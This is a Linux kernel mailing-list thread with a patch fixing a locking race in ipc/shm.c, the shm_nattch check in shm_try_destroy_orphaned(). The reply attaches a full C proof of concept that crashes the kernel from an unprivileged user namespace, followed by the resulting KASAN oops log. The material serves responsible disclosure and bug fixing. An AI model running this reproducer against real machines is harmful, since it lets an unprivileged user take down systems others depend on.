ipc/shm.c | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-)
shm_try_destroy_orphaned() reads shm_nattch via shm_may_destroy()
without holding the per-object spinlock, relying on rwsem alone for
synchronization. However, do_shmat() modifies shm_nattch under the
per-object spinlock (not rwsem), creating a TOCTOU race:
CPU 0 (do_shmat) CPU 1 (shm_try_destroy_orphaned)
ipc_lock_object()
shm_nattch++ (0 -> 1)
ipc_unlock_object()
shm_may_destroy() -> reads stale nattch==0
shm_lock_by_ptr()
shm_destroy() // nattch is actually 1!
The segment is destroyed while do_shmat() has already incremented
shm_nattch and is proceeding with the mmap setup. When do_shmat()
later reaches out_nattch, shm_lock() returns ERR_PTR (the IDR entry
was removed by shm_destroy) and the code dereferences it without an
IS_ERR() check, causing a null-ptr-deref crash:
BUG: kernel NULL pointer dereference, address: 0000000000000072
RIP: 0010:do_shmat (ipc/shm.c:1678)
Call Trace:
__x64_sys_shmat (ipc/shm.c:1699 ipc/shm.c:1693 ipc/shm.c:1693)
do_syscall_64 (arch/x86/entry/syscall_64.c:94)
[...]
Fix by taking the object lock before checking shm_may_destroy() in
shm_try_destroy_orphaned(), so the check sees the up-to-date value
of shm_nattch.
Fixes: 4c677e2eefdb ("shm: optimize locking and ipc_namespace getting")
Reported-by: Weiming Shi <bestswngs@gmail.com>
Signed-off-by: Xiang Mei <xmei5@asu.edu>
---
ipc/shm.c | 13 +++++++------
1 file changed, 7 insertions(+), 6 deletions(-)
diff --git a/ipc/shm.c b/ipc/shm.c
index a95dae447707..50f9aa7ff33a 100644
--- a/ipc/shm.c
+++ b/ipc/shm.c
@@ -416,17 +416,18 @@ static int shm_try_destroy_orphaned(int id, void *p, void *data)
/*
* We want to destroy segments without users and with already
- * exit'ed originating process.
- *
- * As shp->* are changed under rwsem, it's safe to skip shp locking.
+ * exit'ed originating process. Take the object lock before
+ * checking shm_may_destroy() since shm_nattch can be modified
+ * under the object lock alone (e.g. by do_shmat).
*/
if (!list_empty(&shp->shm_clist))
return 0;
- if (shm_may_destroy(shp)) {
- shm_lock_by_ptr(shp);
+ shm_lock_by_ptr(shp);
+ if (shm_may_destroy(shp))
shm_destroy(ns, shp);
- }
+ else
+ shm_unlock(shp);
return 0;
}
--
2.43.0
On Sat, Mar 28, 2026 at 06:36:46PM -0700, Xiang Mei wrote:
> shm_try_destroy_orphaned() reads shm_nattch via shm_may_destroy()
> without holding the per-object spinlock, relying on rwsem alone for
> synchronization. However, do_shmat() modifies shm_nattch under the
> per-object spinlock (not rwsem), creating a TOCTOU race:
>
> CPU 0 (do_shmat) CPU 1 (shm_try_destroy_orphaned)
> ipc_lock_object()
> shm_nattch++ (0 -> 1)
> ipc_unlock_object()
> shm_may_destroy() -> reads stale nattch==0
> shm_lock_by_ptr()
> shm_destroy() // nattch is actually 1!
>
> The segment is destroyed while do_shmat() has already incremented
> shm_nattch and is proceeding with the mmap setup. When do_shmat()
> later reaches out_nattch, shm_lock() returns ERR_PTR (the IDR entry
> was removed by shm_destroy) and the code dereferences it without an
> IS_ERR() check, causing a null-ptr-deref crash:
>
> BUG: kernel NULL pointer dereference, address: 0000000000000072
> RIP: 0010:do_shmat (ipc/shm.c:1678)
> Call Trace:
> __x64_sys_shmat (ipc/shm.c:1699 ipc/shm.c:1693 ipc/shm.c:1693)
> do_syscall_64 (arch/x86/entry/syscall_64.c:94)
> [...]
>
> Fix by taking the object lock before checking shm_may_destroy() in
> shm_try_destroy_orphaned(), so the check sees the up-to-date value
> of shm_nattch.
>
> Fixes: 4c677e2eefdb ("shm: optimize locking and ipc_namespace getting")
> Reported-by: Weiming Shi <bestswngs@gmail.com>
> Signed-off-by: Xiang Mei <xmei5@asu.edu>
> ---
> ipc/shm.c | 13 +++++++------
> 1 file changed, 7 insertions(+), 6 deletions(-)
>
> diff --git a/ipc/shm.c b/ipc/shm.c
> index a95dae447707..50f9aa7ff33a 100644
> --- a/ipc/shm.c
> +++ b/ipc/shm.c
> @@ -416,17 +416,18 @@ static int shm_try_destroy_orphaned(int id, void *p, void *data)
>
> /*
> * We want to destroy segments without users and with already
> - * exit'ed originating process.
> - *
> - * As shp->* are changed under rwsem, it's safe to skip shp locking.
> + * exit'ed originating process. Take the object lock before
> + * checking shm_may_destroy() since shm_nattch can be modified
> + * under the object lock alone (e.g. by do_shmat).
> */
> if (!list_empty(&shp->shm_clist))
> return 0;
>
> - if (shm_may_destroy(shp)) {
> - shm_lock_by_ptr(shp);
> + shm_lock_by_ptr(shp);
> + if (shm_may_destroy(shp))
> shm_destroy(ns, shp);
> - }
> + else
> + shm_unlock(shp);
> return 0;
> }
>
> --
> 2.43.0
>
Thanks for your attention to this bug. I'll attach the required information
to help you reproduce the bug:
PoC Source Code:
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <pthread.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <errno.h>
#include <stdint.h>
#define SHM_SIZE 4096
#define NUM_ITERATIONS 500000
static volatile int stop = 0;
/* Setup unprivileged namespace: NEWUSER + NEWIPC */
static void setup_ns(void) {
uid_t uid = getuid();
gid_t gid = getgid();
if (unshare(CLONE_NEWUSER | CLONE_NEWIPC) < 0) {
perror("unshare");
exit(1);
}
/* Write uid/gid maps */
int fd;
char buf[64];
fd = open("/proc/self/setgroups", O_WRONLY);
if (fd >= 0) { write(fd, "deny", 4); close(fd); }
fd = open("/proc/self/uid_map", O_WRONLY);
if (fd >= 0) {
int n = snprintf(buf, sizeof(buf), "0 %d 1", uid);
write(fd, buf, n);
close(fd);
}
fd = open("/proc/self/gid_map", O_WRONLY);
if (fd >= 0) {
int n = snprintf(buf, sizeof(buf), "0 %d 1", gid);
write(fd, buf, n);
close(fd);
}
}
void *toggle_rmid_forced(void *arg) {
while (!stop) {
int fd = open("/proc/sys/kernel/shm_rmid_forced", O_WRONLY);
if (fd >= 0) { write(fd, "1", 1); close(fd); }
fd = open("/proc/sys/kernel/shm_rmid_forced", O_WRONLY);
if (fd >= 0) { write(fd, "0", 1); close(fd); }
}
return NULL;
}
int create_orphaned_shm(void) {
int shmid = -1;
int pipefd[2];
if (pipe(pipefd) < 0) return -1;
pid_t pid = fork();
if (pid < 0) { close(pipefd[0]); close(pipefd[1]); return -1; }
if (pid == 0) {
close(pipefd[0]);
shmid = shmget(IPC_PRIVATE, SHM_SIZE, IPC_CREAT | 0666);
if (shmid < 0) { int e = -1; write(pipefd[1], &e, sizeof(e)); }
else write(pipefd[1], &shmid, sizeof(shmid));
close(pipefd[1]);
_exit(0);
}
close(pipefd[1]);
read(pipefd[0], &shmid, sizeof(shmid));
close(pipefd[0]);
waitpid(pid, NULL, 0);
return shmid;
}
void *shmat_worker(void *arg) {
int iter = 0;
while (!stop && iter < NUM_ITERATIONS) {
int shmid = create_orphaned_shm();
if (shmid < 0) { usleep(100); continue; }
void *addr = shmat(shmid, NULL, 0);
if (addr != (void *)-1)
shmdt(addr);
shmctl(shmid, IPC_RMID, NULL);
iter++;
}
return NULL;
}
int main(int argc, char *argv[]) {
setup_ns();
pthread_t toggle_threads[2];
for (int i = 0; i < 2; i++)
pthread_create(&toggle_threads[i], NULL, toggle_rmid_forced, NULL);
#define NUM_WORKERS 4
pthread_t workers[NUM_WORKERS];
for (int i = 0; i < NUM_WORKERS; i++)
pthread_create(&workers[i], NULL, shmat_worker, NULL);
for (int i = 0; i < NUM_WORKERS; i++)
pthread_join(workers[i], NULL);
stop = 1;
for (int i = 0; i < 2; i++)
pthread_join(toggle_threads[i], NULL);
return 0;
}
```
Intended Crash:
```
[ 1.310476] Oops: general protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] SMP KASAN NOPTI
[ 1.310969] KASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]
[ 1.311301] CPU: 0 UID: 1000 PID: 153 Comm: exploit Not tainted 7.0.0-rc5+ #6 PREEMPTLAZY
[ 1.311631] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014
[ 1.312087] RIP: 0010:do_shmat+0x699/0xee0
[ 1.312279] Code: 48 8b 4c 24 08 41 80 7c 24 04 00 0f 85 1b 01 00 00 49 8d bc 24 88 00 00 00 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 26 06 00 00 49 83 ac 24 88 00 00 00 01 0f 85 b7
[ 1.313011] RSP: 0018:ffff88800f1b7da0 EFLAGS: 00010202
[ 1.313243] RAX: dffffc0000000000 RBX: ffff88800e5771c8 RCX: ffffffffffffffea
[ 1.313539] RDX: 000000000000000e RSI: ffffed1001caee3f RDI: 0000000000000072
[ 1.313844] RBP: 1ffff11001e36fbe R08: ffff88800e5771f8 R09: 0000000000000040
[ 1.314155] R10: ffff88800e5771d7 R11: 000000000bbb6319 R12: ffffffffffffffea
[ 1.314478] R13: ffff88800dd4ee50 R14: ffff88800f182b58 R15: ffff888013c4c000
[ 1.314782] FS: 00007ad9ea0716c0(0000) GS:ffff888178099000(0000) knlGS:0000000000000000
[ 1.315162] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1.315442] CR2: 00000000004ca868 CR3: 000000000f0fa005 CR4: 0000000000772ef0
[ 1.315783] PKRU: 55555554
[ 1.315917] Call Trace:
[ 1.316035] <TASK>
[ 1.316163] ? __pfx_do_shmat+0x10/0x10
[ 1.316339] __x64_sys_shmat+0xd4/0x150
[ 1.316515] ? file_close_fd_locked+0x178/0x2a0
[ 1.316714] ? __pfx___x64_sys_shmat+0x10/0x10
[ 1.316925] do_syscall_64+0xc3/0x6e0
[ 1.317097] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 1.317349] RIP: 0033:0x4208ab
```
Please let me know if you have any questions for the patch and poc.
Thanks,
Xiang
© 2016 - 2026 Red Hat, Inc.